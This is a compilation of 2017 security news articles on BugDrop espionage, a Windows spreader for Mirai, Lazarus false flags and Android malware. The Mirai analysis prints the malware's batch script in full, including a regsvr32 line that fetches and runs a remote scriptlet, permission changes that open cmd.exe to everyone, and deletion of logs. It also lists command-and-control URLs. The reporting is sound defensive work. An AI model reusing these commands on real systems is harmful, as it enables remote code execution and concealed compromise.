“Initially, CyberX saw similarities between Operation BugDrop and a previous cyber-surveillance operation discovered by ESET in May 2016 called Operation Groundbait. However, despite some similarities in the Tactics, Techniques, and Procedures (TTPs) used by the hackers in both operations, Operation BugDrop’s TTPs are significantly more sophisticated than those used in the earlier operation.” reads the analysis that also include the following example.
Dropbox for data exfiltration, a clever approach because Dropbox traffic is typically not blocked or monitored by corporate firewalls.
Reflective DLL Injection, an advanced technique for injecting malware that was also used by BlackEnergy in the Ukrainian grid attacks and by Duqu in the Stuxnet attacks on Iranian nuclear facilities. Reflective DLL Injection loads malicious code without calling the normal Windows API calls, thereby bypassing security verification of the code before its gets loaded into memory.
Encrypted DLLs, thereby avoiding detection by common anti-virus and sandboxing systems because they’re unable to analyze encrypted files.
Using legitimate free web hosting sites for command-and-control infrastructure. C&C servers are a potential pitfall for attackers as investigators can often identify attackers using registration details for the C&C server obtained via freely-available tools such as whois and PassiveTotal. Free web hosting sites, on the other hand, require little or no registration information. Operation BugDrop uses a free web hosting site to store the core malware module that gets downloaded to infected victims. In comparison, the Groundbait attackers registered and paid for their own malicious domains and IP addressees.
The CyberX researchers speculate the involvement of a nation-state actor behind the Operation BugDrop.
“Skilled hackers with substantial financial resources carried out Operation BugDrop,” reads the analysis. “Given the amount of data analysis that needed to be done on [a] daily basis, we believe BugDrop was heavily staffed. Given the sophistication of the code and how well the operation was executed, we have concluded that those carrying it out have previous field experience.”
New(ish) Mirai Spreader Poses New Risks
21.2.2017 Kaspersky BotNet
A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly. However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.
The earliest we observed this spreader variant pushing Mirai downloaders was January 2016. This Windows bot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t have a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a new threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they can be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center software, and other internal devices.
So, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very limited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web resources and servers. These servers help provide a better timeline of operation for the operator. One of the directly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And most of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest code or most impressive leap.
Regardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows platform. Much like the Zeus banking trojan source code release that brought years of problems for the online community, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure for years to come, and this is just a minor start.
Notably, the 2016 Mirai operations were unique for two reasons:
newly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers) on a large scale
record setting DDoS traffic generation, exceeding all previous volumes
The great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation states’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of nation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the Internet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down wide swaths of the internet using this juvenile toolset? It’s very possible.
In response to the huge problem this poses to the internet infrastructure, over the past few months, our team and CERT have participated in multiple successful command and control takedown efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these takedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And, we are happy to partner with more network operators to leverage our connections with CERTs, LE, and other partners around the world to further enable this success.
The Windows Spreader – Who What Where
This Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading techniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot executables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and checks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot. These devices include
IP-based cameras
DVR
Media center appliances
Various Raspberry and Banana Pi
Unfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from string artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in Taiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it is likely that this developer/operator is Chinese speaking.
The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and network for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source is publicly available.
Below is a proportional comparison of the second stage component’s IP geolocations (fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is served from one of two web hosts, both hosted in Taiwan :
http://down.mykings[.]pw:8888/ups.rar
http://up.mykings[.]pw:8888/ups.rar
When downloaded, it is copied to disk with one of several filenames and executed:
cab.exe, ms.exe, cftmon.exe
Clearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.
Components
The bot code and various components have been pulled together from other projects and previous sources. At runtime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading additional configuration files, fetching further instruction, and downloading and running additional executable code. Again, mostly all of these components, techniques, and functionality are several years old and are very large file objects.
Windows Spreader Infection Process
i.e. c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
Changes DNS settings to 114.114.114.114, 8.8.8.8.
downloads and executes
from hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)
hxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)
Downloads
hxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg (b27590a4b89d31dc0210c3158b82c175) to c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
and runs with command line parameters “-create” “-run”
Downloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)
This file is a command shell script that registers a variety of files, including database connectivity libraries, and cleans up unneeded traces of itself on the system.
http://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)
It copies itself to the tasks directory, and installs itself as a scheduled job.
c:\windows\system\my1.bat
c:\windows\tasks\my1.job
c:\windows\system\upslist.txt
c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping 127.0.0.1 -n 6 && del c:\windows\system\msinfo.exe >> NUL
c:\program files\kugou2010\ms.exe (10164584800228de0003a37be3a61c4d)
Keylogger (hosted as comments within jpeg files)
This botnet operator hosts components embedded within jpeg comments, a technique they have been using since 2013. These techniques provide very large file objects. So, even a fresh image downloaded by this bot of Taylor Swift contains 2.3mb of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):
Modular bot code
Also interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (sql injection) and brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various attacks. The bots are instructed on individual tasks per an encrypted file downloaded from the available c2.
[Cracker:IPC][Cracker:MSSQL]
[Cracker:MySQL][Cracker:RDP][Cracker:SSH][Cracker:RDP][Cracker:Telnet][Cracker:WMI]
The Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken out across source libraries:
CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
cService.cpp
CThreadPool.cpp
Db_Mysql.cpp
Dispatcher.cpp
IpFetcher.cpp
libtelnet.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Mysql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp
catdbsvc.cpp
catadnew.cpp
catdbcli.cpp
waitsvc.cpp
errlog.cpp
Code signing certificates
The code signing certificates appear to be stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China, and an expired one.
Kaspersky Lab products detect and prevent infections from these bots.
File object scan verdicts
Trojan.Win32.SelfDel.ehlq
Trojan.Win32.Agent.ikad
Trojan.Win32.Agentb.btlt
Trojan.Win32.Agentb.budb
Trojan.Win32.Zapchast.ajbs
Trojan.BAT.Starter.hj
Trojan-PSW.Win32.Agent.lsmj
Trojan-Downloader.Win32.Agent.hesn
Trojan-Downloader.Win32.Agent.silgjn
HEUR:Trojan-Downloader.Linux.Gafgyt.b
Backdoor.Win32.Agent.dpeu
DangerousPattern.Multi.Generic (UDS)
Behavioral verdicts
Trojan.Win32.Generic
Trojan.Win32.Bazon.a
Trojan.Win32.Truebadur.a
DangerousObject.Multi.Chupitio.a
Appendix
c2 and url
http://dwon.f321y[.]com:280/mysql.exe
http://downs.f4321y[.]com:280/psa.jpg
https://down2.b5w91[.]com:8443
http://down.f4321y[.]com:8888/kill.html
http://down.f4321y[.]com:8888/test.html
http://down.f4321y[.]com:8888/ups.rar
http://67.229.225.20
http://down.f4321y[.]com
http://up.f4321y[.]com
http://up.f4321y[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://up.f4321y[.]com:8888/update.txt
http://up.f4321y[.]com:8888/wpdmd5.txt
http://up.f4321y[.]com:8888/wpd.dat
http://down.F4321Y[.]com:8888/my1.html
http://up.mykings[.]pw:8888/ver.txt
http://up.mykings[.]pw:8888/ups.rar
http://up.mykings[.]pw:8888/update.txt
http://up.mykings[.]pw:8888/wpdmd5.txt
http://up.mykings[.]pw:8888/wpd.dat
http://down.mykings[.]pw:8888/my1.html
http://down.mykings[.]pw:8888/ups.rar
http://down.mykings[.]pw:8888/item.dat
http://js.f4321y[.]com:280/v.sct
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/wpd.dat
http://down2.b591[.]com:8888/wpdmd5.txt
http://down2.b591[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://ww3.sinaimg[.]cn/mw690/717a8b4dgw1f99ly7blarj20c40e4b2a.jpg
http://img1.timeface[.]cn/times/a4c7eb57bb7192a226ac0fb6a80f2164.jpg
http://downs.b591[.]com:280/ppsa.jpg
http://down.b591[.]com:8888/test.html
http://downs.b591[.]com:280/pps.jpg
http://dwon.kill1234[.]com:280/cao.exe
http://down.b591[.]com:8888/ups.rar
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/cab.rar
http://down.b591[.]com:8888/cacls.rar
http://down.b591[.]com:8888/kill.html
Certificates
Xi’ an JingTech electronic Technology Co.,LTD
sn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36
Partner Tech(Shanghai)Co.,Ltd
sn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89
Md5
e7761db0f63bc09cf5e4193fd6926c5e
c88ece9a379f4a714afaf5b8615fc66c
91a12a4cf437589ba70b1687f5acad19
a3c09c2c3216a3a24dce18fd60a5ffc2
297d1980ce171ddaeb7002bc020fe6b6
5707f1e71da33a1ab9fe2796dbe3fc74
a4c7eb57bb7192a226ac0fb6a80f2164
64f0f4b45626e855b92a4764de62411b
02b0021e6cd5f82b8340ad37edc742a0
10164584800228de0003a37be3a61c4d
fd7f188b853d5eef3760228159698fd8
cbe2648663ff1d548e036cbe4351be39
fb7b79e9337565965303c159f399f41b
eb814d4e8473e75dcbb4b6c5ab1fa95b
04eb90800dff297e74ba7b81630eb5f7
508f53df8840f40296434dfb36087a17
93ccd8225c8695cade5535726b0dd0b6
62270a12707a4dcf1865ba766aeda9bc
43e7580e15152b67112d3dad71c247ec
0779a417e2bc6bfac28f4fb79293ec34
ac8d3581841b8c924a76e7e0d5fced8d
cf1ba0472eed104bdf03a1712b3b8e3d
4eee4cd06367b9eac405870ea2fd2094
21d291a8027e6de5095f033d594685d0
097d32a1dc4f8ca19a255c401c5ab2b6
5950dfc2f350587a7e88fa012b3f8d92
2d411f5f92984a95d4c93c5873d9ae00
9a83639881c1a707d8bbd70f871004a0
5cae130b4ee424ba9d9fa62cf1218679
2346135f2794de4734b9d9a27dc850e1
fe7d9bdbf6f314b471f89f17b35bfbcd
c289c15d0f7e694382a7e0a2dc8bdfd8
9098e520c4c1255299a2512e5e1135ba
db2a34ac873177b297208719fad97ffa
defff110df48eb72c16ce88ffb3b2207
c289c15d0f7e694382a7e0a2dc8bdfd8
c75bd297b87d71c8c73e6e27348c67d5
5af3bab901735575d5d0958921174b17
1a6fea56dc4ee1c445054e6bc208ce4f
ae173e8562f6babacb8e09d0d6c29276
ad0496f544762a95af11f9314e434e94
Contents of http://down.mykings[.]pw:8888/my1.html
@echo off
mode con: cols=13 lines=1
if exist C:\downs\runs.exe start C:\downs\runs.exe
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
start regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v shell /f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
del %0
exit
Contents of http://up.mykings[.]pw:8888/update.txt
http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\windows\system\msinfo.exe
http://down.mykings[.]pw:8888/my1.html c:\windows\system\my1.bat
Malware Hijacks Microphones to Spy On Ukrainian Businesses, Scientists and Media
21.2.2017 thehackernews Virus
Ukraine has once again been a target of a potential hacking attack that infected computer systems from dozens of Ukrainian businesses with highly sophisticated malware, allowing hackers to exfiltrate sensitive data and eavesdrop on their network.
Late last year, the country also suffered a power outage caused by the same group of hackers that targeted Ukraine's power grid with the BlackEnergy malware in late 2015, causing 225,000 residents to lose electricity.
Now security researchers from threat intelligence firm CyberX have uncovered an advanced malware-based operation that has already siphoned over 600 gigabytes of data from about 70 victim organizations, including critical infrastructure, news media, and scientific research.
Operation BugDrop: Damages and Modus Operandi
Dubbed "Operation BugDrop," the large-scale malware campaign has been perpetrated against targets in the Ukraine, though targets from other countries include Russia, Saudi Arabia, and Austria.
CyberX researchers did not identify the clandestine hacking collective but said Operation BugDrop was believed to be the work of highly skilled, government-backed nation-state hackers with nearly limitless resources.
"Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources," reads the CyberX blog post published Wednesday.
"In particular, the operation requires a massive back-end infrastructure to store, decrypt, and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics."
Here's What the Malware Does:
Operation BugDrop uses sophisticated malware that has been designed to infiltrate the victim's computer and capture screen shots, documents, and passwords, and turn on the PC's microphone to capture audio recordings of all conversations.
The mysterious hacking group infects victims using malicious Microsoft Word documents sent in phishing emails. Once infected, the compromised PCs send the pilfered audio and data to Dropbox, where the hackers retrieve it.
Since the malware uses PC microphones to bug targets and then send the audio and other data files to Dropbox, the researchers have dubbed the malware campaign Operation BugDrop.
Here's How BugDrop Work:
The hackers spread the malware through phishing emails containing Microsoft Office file attachments that include malicious macros embedded in it.
Once the targets open the malware-laden Word document, the hidden, malicious Visual Basic scripts start running in a temporary folder in the background.
The main module of BugDrop downloads the various data-stealing plugins to infected machines and executes them. All the stolen data the malware collects is then uploaded to Dropbox.
Although BugDrop has mainly been designed to record audio files, the malware can also steal the documents, password and other sensitive data from the computer's browsers.
Techniques BugDrop Use to Avoid Detection:
The main malware downloader has low detection rates as:
The malware makes the audio data look like legitimate outgoing traffic.
BugDrop encrypts the DLLs that are installed to avoid detection by traditional anti-virus and sandboxing systems.
The malware uses public cloud service Dropbox.
BugDrop also uses Reflective DLL (Dynamic Link Library) Injection, a malware injection technique that had also been leveraged by the BlackEnergy malware used in the Ukrainian power grid attacks and the Duqu malware in the Stuxnet attacks on Iranian nuclear facilities.
Reflective DLL Injection is used to load malicious code and effectively sidestep security verification procedures without calling the standard Windows API.
Targets of BugDrop:
The malware has targeted a wide range of industries including critical infrastructures, research centers in Ukraine and media organizations.
According to CyberX, BugDrop's primary target has been Ukraine, but it has also been traced to other parts of Russia, Saudi Arabia, and Austria.
Operation BugDrop targets identified by the CyberX researchers so far include:
A firm that designs remote monitoring systems for oil and gas pipeline infrastructures.
An engineering firm that designs electrical substations, water supply plants and gas distribution pipelines.
An international organization that monitors counter-terrorism, human rights, and cyber attacks on critical infrastructure in the Ukraine.
A scientific research institute.
Editors of Ukrainian newspapers.
While concluding the report, CyberX said both private and public sector organizations need to be more vigilant in monitoring their networks and applying more modern technologies like behavioral analytics to identify and quickly respond to these increasingly sophisticated cyber attacks.
Experts at BAE Systems found false flags in the Lazarus malware
21.2.2017 securityaffairs Virus
Security experts who analyzed the malware used in the attacks against the Polish banks discovered false flags in the Lazarus malicious code.
A few weeks ago, security experts reported that the systems of several Polish banks were targeted by hackers. The systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.
Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.
According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on the banks, but the list of victims also includes ISPs and telecom operators.
Now further revelations emerge from the investigation conducted by security firms, the threat actors unsuccessfully attempted to trick researchers into attributing their operation to Russian-speaking hackers.
The researchers believe that the threat actors have conducted false flag operations to deceive the investigator and increase the difficulty in attributing the attack.
Experts at BAE Systems have dissected half a dozen malware samples and discovered several Russian words in the source code.
“Once the bot has established communication with the remote C&C, it uses several transliterated Russian words to either indicate the state of its communication or issue backdoor commands, such as:
Word State/Backdoor Command
“Nachalo” start communication session
“ustanavlivat” handshake state
“poluchit” receive data
“pereslat” send data
“derzhat” maintain communication session
“vykhodit” exit communication session
A deeper analysis conducted by the researchers revealed that the commands were likely the result of an online translation.
“In spite of some ‘Russian’ words being used, it is evident that the malware author is not a native Russian speaker.” states the blog post published by BaeSystems.
“Of our previous examples, five of the commands were likely produced by an online translation. Below we provide the examples and the correct analogues for reference:”
Word Type of error Correct analogue
“ustanavlivat” omitted sign at the end, verb tense error “ustanovit'” or “ustanoviti”
“poluchit” omitted sign at the end “poluchit'” or “poluchiti”
“pereslat” omitted sign at the end “pereslat'” or “pereslati”
“derzhat” omitted sign at the end “derzhat'” or “derzhati”
“vykhodit” omitted sign at the end, verb tense error “vyiti”
Several words are written as they are pronounced.
“Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In some cases, the inaccurate translations have transformed the meaning of the words entirely. This strongly implies that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be a ‘false flag’,” continues the analysis.
The threat actor is clearly switching tactic and evolving its modus operandi to avoid detection and make hard the attribution of the attacks.
Trojan Downloader Masquerades as Defunct Flash Player for Android
20.2.2017 securityweek Android
A recently observed malware downloader targeting Android users is masquerading as an update for Adobe Flash Player, ESET researchers warn.
Although the Flash Player for Android was discontinued nearly half a decade ago, cybercriminals are still abusing it to trick unsuspecting users into downloading and installing their malicious programs. As always, the attackers rely on user’s willingness to download and install a fake update when prompted to do so via a well-designed, legitimate-looking update screen.
Dubbed Android/TrojanDownloader.Agent.JI, the newly discovered threat uses this technique to infect the devices of users navigating social media or adult sites. Following installation, the malware presents more deceptive screens to its victims, to trick them into granting it special permissions in the Android accessibility menu, which then allow it to download and execute additional malware.
For that, the Trojan displays a fake screen informing the victim of “too much consumption of energy” and urging that a “Saving Battery” mode is enabled. As most malware, this downloader won’t take no for an answer and would continue to display the message until the user agrees to enable the service.
At this point, the malware takes the victim to the Android Accessibility menu, which displays a list of services with accessibility functions, including a new service that the malware has created during the installation process, called “Saving battery.” When the user enables it, it requests permissions to monitor actions, retrieve window content, and turn on explore by touch.
As soon as the service has been enabled, the fake Flash Player icon is hidden from the user, although the malware runs in the background. It contacts the command and control (C&C) server to deliver information about the infected device and receive a link to a malicious app to download (which could be banking malware, ransomware, adware, or spyware).
After receiving the link, the malware displays a bogus lockscreen that the user can’t dismiss, in an attempt to mask the nefarious activities it is engaged in. Because it has the permission to mimic the user’s clicks, the Trojan can now “download, install, execute and activate device administrator rights for additional malware without the user’s consent, all while remaining unseen under the fake lock screen,” ESET explains.
To remove the malicious program, users should head to Settings -> Application Manager and try to manually uninstall it. However, should the malware have Device admin rights enabled (it requests those as well in some cases), users should head to Settings -> Security -> Flash-Player and deactivate those first.
Uninstalling the downloader, however, might prove only a partial solution, as the malware fetched and installed by the threat would remain on the infected device. Victims should install a mobile security application to perform a full cleanup.
To stay protected, users are advised to avoid installing applications from third-party, untrusted websites, but use only legitimate app stores, such as Google Play, instead. Users should also pay close attention to the permissions newly installed programs request, as those that don’t seem appropriate for the software’s functions might be a giveaway of malicious intent.
Google Discloses Unpatched Windows GDI Vulnerability
20.2.2017 securityweek Vulnerebility
An unpatched vulnerability affecting the Windows Graphics Device Interface (Windows GDI) was publicly disclosed last week after Microsoft failed to address it within 90 days after being notified.
The issue was disclosed by Mateusz Jurczyk, an engineer with Google's Project Zero team, who initially discovered it along with other bugs in the user-mode Windows GDI library (gdi32.dll) in March 2016. Microsoft attempted to address these issues with the June 2016 set of monthly patches (security bulletin MS16-074), but apparently failed to do so.
While taking a look at the patched gdi32.dll, the Google security researcher discovered that some of the bugs were indeed resolved, but that others were still presenting security risks. In November 2016, the researcher filed another report to inform Microsoft on his findings.
As per Google’s Project Zero’s policy, vendors are provided with 90 days to resolve the reported vulnerabilities before they become public knowledge. As soon as the 90 days passed, the report went public, along with a proof-of-concept published by Jurczyk.
This public disclosure, however, appears to have been timed with the publishing of Microsoft’s February 2017 security update, which was expected to happen on February 14, but was delayed for one month “due to a last minute issue that could impact some customers.” The patches were expected to resolve a previously revealed high risk SMB 0-day as well.
Tracked as CVE-2017-0038, the newly disclosed vulnerability is related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records. Last year, Google’s Jurczyk found missing checks “in at least 10 different records,” and says that Microsoft was able to nail only some of them with MS16-074, but that some of them are still posing security risks.
Jurczyk notes that a careful audit of all EMF record handlers that are responsible for dealing with DIBs is required, as it would ensure that all of them can correctly enforce all four conditions. If not all conditions are enforced, invalid memory access (and subsequent memory disclosure) while processing the bitmaps is possible.
The security researcher managed to reproduce the vulnerability locally in Internet Explorer and remotely in Office Online, via a .docx document containing the specially crafted EMF file. The flaw is considered Medium severity.
In November last year, Google went public with information related to a 0-day vulnerability in Windows only 10 days after informing Microsoft on the matter, although a patch hadn’t been released yet. That disclosure too fell within the search giant’s policy, which gives vendors a 7-day deadline to resolve issues actively exploited by malicious actors.
A couple of years ago, Google made changes to its vulnerability disclosure policy after being criticized for enforcing it too strictly.
Android RAT Targeting Israeli Soldiers Part of Larger Campaign
20.2.2017 securityweek Android
An Android Remote Access Trojan (RAT) recently revealed to be targeting Israeli servicemen is part of a larger campaign that might not be associated with Hamas, as initially believed, security researchers have determined.
The attacks, which appear to have started around July 2016 and already hit more than 100 Israeli soldiers, were initiated through social networks and leveraged sophisticated lures to trick victims into installing malware on their Android devices. Focused on exfiltrating data from the compromised phones, the campaign is ongoing, with the most recent attacks observed in February.
Last month, an Israeli military official revealed that the attackers used ‘honey traps’ in the form of fake Facebook profiles featuring alluring photos of attractive young women, and that dozens of predominantly lower-ranked soldiers were duped into downloading fake apps on their phones. The official claimed that Hamas, the Islamist movement that runs the Gaza Strip, was behind the attacks, but didn’t say how the army came to the conclusion.
Now, Kaspersky security researchers, who worked with the Israeli army on investigating the incidents, reveal that the sophisticated attacks were initiated by a “cunning threat actor” and that Israeli Defense Force (IDF) servicemen of different ranks, most of them serving around the Gaza strip, were targeted. Lookout, which also analyzed the attacks, notes that Hamas doesn’t have a “sophisticated mobile capability,” suggesting that another faction is behind the campaign.
The attacks abused social networks such as Facebook to lure targeted servicemen (only IDF soldiers were targeted) into sharing confidential information and installing malicious apps, researchers say. The actors used avatars of young women pretending to be from different countries, including Canada, Germany, Switzerland and more, and attempted to lure victims using sexual innuendo.
Victims were tricked into manually downloading and installing a malicious application, which was designed to function as a dropper. After compromise, the dropper would fetch a list of installed applications and pretend to serve an update for one of them, depending on the findings: either a WhatsApp or Viber update, if one was found on the device, or a generic System Update, if nothing was discovered.
According to Lookout, which calls this Trojan ViperRAT, the actors used Trojanized versions of apps such as SR Chat and YeeCall Pro, as well as a billiards game, an Israeli Love Songs player, and a Move To iOS app, to masquerade the dropper. Kaspersky, on the other hand, discovered the malware hidden in apps such as a YouTube player (LoveSongs) or messaging software (WowoMessanger, YeeCall).
“Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn’t present on their device. ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘update’ that may go unnoticed,” Lookout points out.
The most important part of the attack, however, is the second-stage payload, which includes the surveillanceware capabilities. The malware can collect data from the compromised devices either by executing manual commands from the operator or by performing scheduled tasks (using various Android APIs, the malware collects specific information every 30 seconds).
The exfiltrated data included: contact information, compressed recorded audio, images captured from the device camera, images stored on the device, geolocation information, SMS content, call logs, cell tower information, browser search history and bookmarks, and general information such as network and device metadata (IMEI, operator, device model, SIM information, hardware details, SDK, and the like).
“The actors behind ViperRAT seem to be particularly interested in image data. We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these, 97 percent, were highly likely encrypted images taken using the device camera. We also observed automatically generated files on the C2, indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents,” Lookout notes.
According to Kaspersky, because the RAT doesn’t yet have root permissions implemented, it can’t access WhatsApp database along with the encryption key. The security researchers also note that the malware can update itself and that all of the malicious logic associated with the Trojan was implemented without any native or third-party sources. For example, the call-recording is implemented using Android’s API exclusively.
Although media reports have attributed these attacks to Hamas, Lookout believes that another actor is behind them, mainly because Hamas “is not widely known for having a sophisticated mobile capability.” Furthermore, the security firm notes that ViperRAT, which first surfaced in late 2015, features many default strings in Arabic, either because it was targeting Arabic speakers or because its developer is fluent in Arabic.
At the same time, Kaspersky suggests that the attacks observed so far are only the tip of the iceberg, and that the campaign is likely to continue. “The IDF, which led the research along with Kaspersky Lab researchers, has concluded that this is only the opening shot of this operation. Further, that it is by definition a targeted attack against the Israeli Defense Force, aiming to exfiltrate data on how ground forces are spread, which tactics and equipment the IDF is using and real-time intelligence gathering,” Kaspersky concludes.
Russian Words Used as Decoy in Lazarus-Linked Bank Attacks
20.2.2017 securityweek Attack
A group of hackers that has been targeting financial organizations around the world has unsuccessfully attempted to trick researchers into attributing their operation to Russian-speaking attackers.
Earlier this month, experts reported that the systems of several banks in Poland had been infected with a new piece of malware. Research conducted by Symantec and BAE Systems revealed that the attacks had been part of a bigger campaign that targeted financial and other organizations across 31 countries since at least October 2016.
The malware used in the attacks has been linked to a threat actor tracked as the “Lazarus Group,” which has been active since 2009 or earlier. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States in both espionage and destructive campaigns.
The list of high-profile attacks attributed to the group includes the 2014 attack on Sony, which some believe was carried out by North Korea. Links have also been found between Lazarus and the theft of $81 million from Bangladesh’s Central Bank.
Security experts have often cautioned that attribution is difficult, especially since attackers can conduct so-called false flag operations, which aim to deceive observers. In the recent bank attacks linked to Lazarus, the actor apparently attempted to deceive researchers and make them believe that the malware was developed by Russian speakers.
Experts at BAE Systems have analyzed half a dozen malware samples and identified several Russian words, including for command and control (C&C) communications. However, a closer analysis revealed that the commands were likely the result of an online translation and they would be difficult to understand for a native Russian speaker.
For example, some words are written as they are pronounced (as shown by online translation services), not how they are actually written using Latin script.
“Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In some cases the inaccurate translations have transformed the meaning of the words entirely. This strongly implies that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be a 'false flag',” BAE Systems researchers said in a blog post.
“Clearly the group behind these attacks are evolving their modus operandi in terms of capabilities – but also it seems they’re attempting to mislead investigators who might jump to conclusions in terms of attribution,” they added.
Former Sysadmin Sentenced to Prison for Hacking Industrial Facility
20.2.2017 securityweek Hacking
